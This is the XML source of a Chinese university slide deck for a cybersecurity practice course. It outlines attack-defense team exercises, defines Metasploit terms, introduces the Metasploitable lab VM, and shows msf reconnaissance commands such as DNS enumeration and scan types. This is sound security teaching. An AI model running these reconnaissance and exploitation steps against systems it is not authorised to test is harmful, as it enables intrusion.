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xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag69.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+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heme/themeOverride1.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverr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409" r:id="rId2"/>
    <p:sldId id="283" r:id="rId3"/>
    <p:sldId id="305" r:id="rId4"/>
    <p:sldId id="446" r:id="rId5"/>
    <p:sldId id="410" r:id="rId6"/>
    <p:sldId id="411" r:id="rId7"/>
    <p:sldId id="412" r:id="rId8"/>
    <p:sldId id="447" r:id="rId9"/>
    <p:sldId id="414" r:id="rId10"/>
    <p:sldId id="415" r:id="rId11"/>
    <p:sldId id="417" r:id="rId12"/>
    <p:sldId id="420" r:id="rId13"/>
    <p:sldId id="421" r:id="rId14"/>
    <p:sldId id="422" r:id="rId15"/>
    <p:sldId id="423" r:id="rId16"/>
    <p:sldId id="424" r:id="rId17"/>
    <p:sldId id="428" r:id="rId18"/>
    <p:sldId id="425" r:id="rId19"/>
    <p:sldId id="429" r:id="rId20"/>
    <p:sldId id="431" r:id="rId21"/>
    <p:sldId id="430" r:id="rId22"/>
    <p:sldId id="433" r:id="rId23"/>
    <p:sldId id="434" r:id="rId24"/>
    <p:sldId id="436" r:id="rId25"/>
    <p:sldId id="435" r:id="rId26"/>
    <p:sldId id="437" r:id="rId27"/>
    <p:sldId id="438" r:id="rId28"/>
    <p:sldId id="439" r:id="rId29"/>
    <p:sldId id="440" r:id="rId30"/>
    <p:sldId id="442" r:id="rId31"/>
    <p:sldId id="441"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98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="60" y="207"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="383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4" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1926"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6607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第三级 面对的学生是大三下的学生；已经学习了安全方面的专业知识；定位是网络安全实战者；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们的目标，是希望学生全面掌握各种攻防实战技术，具备解决网络攻防中的各类技术问题的能力；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过基于场景的驱动，学生逐步探索，让学生在实战环境中分析、发现问题，解决问题，具备相应的系统能力。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43707465-57D2-43AC-9E2F-3507248355D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整个综合实践场景采用多场景、多任务、多关卡，强调攻击与防御的角色场景教学。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻防过程包括：</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嗅探得到对方服务器可执行程序</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通过逆向脱掉可执行程序上的壳</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对二进制程序进行分析，发现漏洞，并编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>程序进行攻击</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 4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>发现有漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>二进制程序漏洞进行补丁</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每个小组有四个角色：</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嗅探</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逆向</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攻击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补丁</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嗅探角色通过嗅探获得流量中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、可执行程序就算完成基本任务。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逆向角色对获得的可执行程序进行逆向，脱壳，得到还原后的目标程序就算完成基本任务；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攻击角色对脱壳后的程序找到漏洞，并编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击对方就算完成基本任务；</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补丁角色对已经发现漏洞的程序进行漏洞修补，就算完成基本任务。</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对于学有余力的学生，还可以挑战进阶的任务。</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3707465-57D2-43AC-9E2F-3507248355D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43690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093307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946314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2023/4/24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2023/4/24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18434" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2117"/>
            <a:ext cx="12192000" cy="6853767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="日期占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="6356351"/>
            <a:ext cx="2844800" cy="366184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>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Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="页脚占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>
            <a:ext cx="3860800" cy="366184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" defTabSz="914400" rtl="0" fontAlgn="auto" latinLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" b="0" i="0" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8737600" y="6356351"/>
            <a:ext cx="2844800" cy="366184"/>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E09DCA5-3CEA-4B51-B615-E4DB32AAF438}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="0" i="0" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" b="0" i="0" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:latin typeface="Calibri" panose="020F050202020403020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1" name="文本占位符 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="999528" y="470676"/>
            <a:ext cx="7886700" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2400" b="0">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10827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2023/4/24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2023/4/24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2023/4/24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2023/4/24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2023/4/24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2023/4/24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2023/4/24</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hyperlink" Target="https://222.20.126.93/" TargetMode="Externa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sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络空间安全综合实践（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>III</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1264840" y="4031570"/>
            <a:ext cx="9799200" cy="1472400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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808"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="98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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>框架和相关术语简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploit Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这是一个免费的、开源的渗透测试框架，由 H.D.Moore 在 2003 年发布，后来被 Rapid7 收购。当前稳定版本是使用 Ruby 语言编写的。它拥有世界上最大的渗透测试攻击数据库，每年超过100万次的下载。它也是迄今为止使用 Ruby构建的最复杂的项目之一。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>允许攻击者入侵或危害系统安全性的弱点称为漏洞，漏洞可能存在于操作系统，应用软件甚至网络协议中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击代码或程序，它允许攻击者利用易受攻击的系统并危害其安全性。每个漏洞都有对应的漏洞利用程序。Metasploit有超过 1700 个漏洞利用程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击载荷。它主要用于建立攻击者和受害者机器直接的连接，Metasploit有超过 500个有效攻击载荷。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Module</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块是一个完整的构件，每个模块执行特定的任务，并通过几个模块组成一个单元运行。这种架构的好处是可以很容易的将自己写的利用程序和工具集成到框架中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">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3470"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="9347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Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:t>靶机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Metasploitable漏洞演练系统，它是用来作为MSF攻击用的靶机, 它是一个具有无数未打补丁漏洞与开放了无数高危端口的渗透演练系统。Metasploitable基于Ubuntu Linux，由于基于Ubuntu。Metasploitbale建立的初衷是为了测试一下MSF漏洞框架集工具，它的内核是2.6.24，而且一般在Liunx会产生问题的服务、工具或者软件它都集齐了。版本2添加了更多的漏洞，而且更让人兴奋的是，系统搭载了DVWA、Mutillidae等Web漏洞演练平台。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>现在的最新版本是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>metasploitable3，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploitable 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>更加难以被攻破</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, Me</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tasploitable 3 内置一些安全机制，比如防火墙，权限设置等。此外，Metasploitable 3中有些漏洞在 Metasploit 中并没有漏洞利用模块，需要测试人员自己挖掘。Metasploitable 3 更加有趣，往里面加入了 flag。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>另外，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>metasploitable3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>还可以扩展安装到多个设备。</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521"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="6752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信息收集</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被动信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询域名信息、子域信息、邮箱信息等等，可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, dig</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>等查询</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>metaexploit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>收集信息，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use auxiliary/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enum_dns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set DOMAIN </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>要查询的域名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set THREADS 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>设置线程数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主动信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>主机扫描：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>发现，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ping-sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>端口扫描：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>连接扫描，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>端口扫描：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>操作系统扫描：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>应用程序扫描：</a:t>
            </a:r>
          </a:p>
          <a:p>
